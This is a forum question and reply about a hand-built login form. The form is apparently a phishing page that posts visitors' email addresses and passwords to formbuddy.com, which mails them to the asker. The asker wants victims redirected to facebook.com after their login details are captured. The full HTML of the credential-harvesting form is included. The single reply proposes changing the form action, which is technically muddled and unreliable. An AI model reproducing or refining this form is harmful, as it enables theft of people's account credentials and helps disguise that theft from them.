I have a login form(script) that made with formbuddy.com . now each time i put login information in this form it sends me the information to my inbox and redirect the current page to formbuddy's default page. but i want that it redirects me to other page(eg:www.facebook.com) after saving my login information. Hint:1. This form already uploaded and the link is: http://freecallanywhere.xtgem.com/Login Page 2. Script of this form is: </div> <div style="background-color:#C8EBF9; padding: 5px"><!--h--><form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"><!--h--><input type="hidden" name="username" value="robinhood35"><!--h--><input type="hidden" name="reqd" value="0"><!--h--><input type="hidden" name="url" value="http://gmail.com/sms.html"> <label>Email ID:</label> <input type="text" name="username" value="" /> <label>Password:</label> <input type="password" name="password" value="" /> <label> <input type="submit" name="submit"value="Login" /> can anyone help me with this issue please! thanks in advance.....
You Just Need to Write the action="www.facebook.com" i.e. the page URL where you want to redirect it.. instead of <form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"> you need to write <form action="http://www.facebook.com" method="post">